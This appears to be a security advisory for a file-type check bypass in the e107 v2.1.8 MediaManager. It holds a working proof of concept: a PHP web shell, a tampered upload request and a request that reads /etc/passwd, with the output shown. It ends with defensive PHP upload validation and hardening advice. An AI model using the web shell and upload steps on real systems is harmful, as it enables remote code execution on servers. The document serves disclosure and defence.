e107 v2.1.8 MediaManager bypass filetype check


The MediaManager of e107 v2.1.8 does not properly validate the file type and extension of uploaded files before placing them in a web-accessible path. A remote attacker who can log in to the administration area (step 1 below) can upload a PHP file and then request it, executing arbitrary code with the privileges of the web server process.


  1. Log in to the admin page (/e107_admin/admin.php) and open MediaManager.

  2. Create a PHP file named "backdoor.jpg" (the .jpg extension passes the client-side JavaScript filter) and select it in MediaManager.

<?php system($_GET['q']) ?>

The file type check can be bypassed because it only looks at the extension.

  3. Start the upload and rewrite the request body with Burp Suite as shown below (the filename is changed from backdoor.jpg to backdoor.php). On the server side, the file is accepted as a PHP file.
POST /e107/e107_web/js/plupload/upload.php?for=&path= HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary2aneEcIB6Abe9JcJ
Cookie: my_cookie=********************
Connection: close
Content-Length: 503

Content-Disposition: form-data; name="name"

Content-Disposition: form-data; name="chunk"

Content-Disposition: form-data; name="chunks"

Content-Disposition: form-data; name="file"; filename="backdoor.php"
Content-Type: image/jpeg

<?php system($_GET['q']) ?>
  4. After the uploaded file is imported, it is placed in a directory that is accessible without authentication. Access http://localhost/e107/e107_media/416f4602e3/files/2018-08/backdoor.php?q=cat%20/etc/passwd. The result of the OS command execution is displayed:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

Source Code

The file type check is performed only by a filter on the client side, so it is easily bypassed by rewriting the request; the server never verifies the extension or the content of the uploaded file itself.
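The server-side check that is missing here, written as an added example in PHP (this is not e107's code and does not reflect how the project fixed the issue). The function name validate_media_upload(), the MEDIA_ALLOWED allow-list and the MEDIA_DIR constant in the usage comment are assumptions; the inputs are the values an upload handler would read from $_FILES.

```php
<?php
// Added example, not e107 code: server-side validation for a media upload.
// Assumed names: validate_media_upload(), MEDIA_ALLOWED, MEDIA_DIR.
declare(strict_types=1);

// Allow-list keyed by extension; the value is the MIME type libmagic must
// report for the file *contents*. Anything not listed is rejected.
const MEDIA_ALLOWED = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
];

/**
 * Returns a safe server-side file name to store the upload under, or throws.
 * $clientType (the multipart part's Content-Type header) is deliberately
 * unused: it is attacker-controlled, exactly like the filename= value in the
 * request above, so it must never decide what the file is.
 */
function validate_media_upload(string $tmpPath, string $clientName, string $clientType = ''): string
{
    // 1. Extension: only the last component of the client name, lower-cased,
    //    checked against the allow-list. Note that the stored name is
    //    generated in step 4, so a client name like "x.php.jpg" cannot reach
    //    the disk with its second extension intact.
    $ext = strtolower(pathinfo(basename($clientName), PATHINFO_EXTENSION));
    if (!array_key_exists($ext, MEDIA_ALLOWED)) {
        throw new RuntimeException("extension .$ext is not allowed");
    }

    // 2. Content: sniff the bytes with libmagic and require that the detected
    //    type matches what the extension promises. A file that is just
    //    "<?php ..." is detected as text/x-php or text/plain, never image/jpeg.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $detected = $finfo->file($tmpPath) ?: 'unknown';
    if ($detected !== MEDIA_ALLOWED[$ext]) {
        throw new RuntimeException("content is $detected, not " . MEDIA_ALLOWED[$ext]);
    }

    // 3. The image header must also parse. This rejects plain text and
    //    truncated junk, but NOT a valid image that carries PHP in a comment
    //    segment; stopping that case requires the web server to refuse to
    //    execute scripts from the media directory (see the note below).
    if (@getimagesize($tmpPath) === false) {
        throw new RuntimeException('file is not a parseable image');
    }

    // 4. Never reuse the client's name on disk: a random name means the
    //    stored path is not attacker-chosen and carries only the vetted extension.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Usage from an upload handler. is_uploaded_file() confirms the temp path
// really came from this request's multipart body and not an arbitrary local file.
//
//   if (!is_uploaded_file($_FILES['file']['tmp_name'])) { http_response_code(400); exit; }
//   try {
//       $stored = validate_media_upload(
//           $_FILES['file']['tmp_name'], $_FILES['file']['name'], $_FILES['file']['type']);
//       move_uploaded_file($_FILES['file']['tmp_name'], MEDIA_DIR . '/' . $stored);
//   } catch (RuntimeException $e) {
//       http_response_code(415);
//       exit('rejected: ' . $e->getMessage());
//   }
```

Run against the request shown in step 3, the check fails at step 1 (".php" is not in the allow-list); run against the original "backdoor.jpg" from step 2, it fails at step 2 (the body is PHP text, not image/jpeg). Content validation alone is still not sufficient for the second case in general, so the media directory should additionally be served with script execution disabled (for example, no PHP handler for e107_media/ in the web server configuration), which turns a successful upload into a harmless static file.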


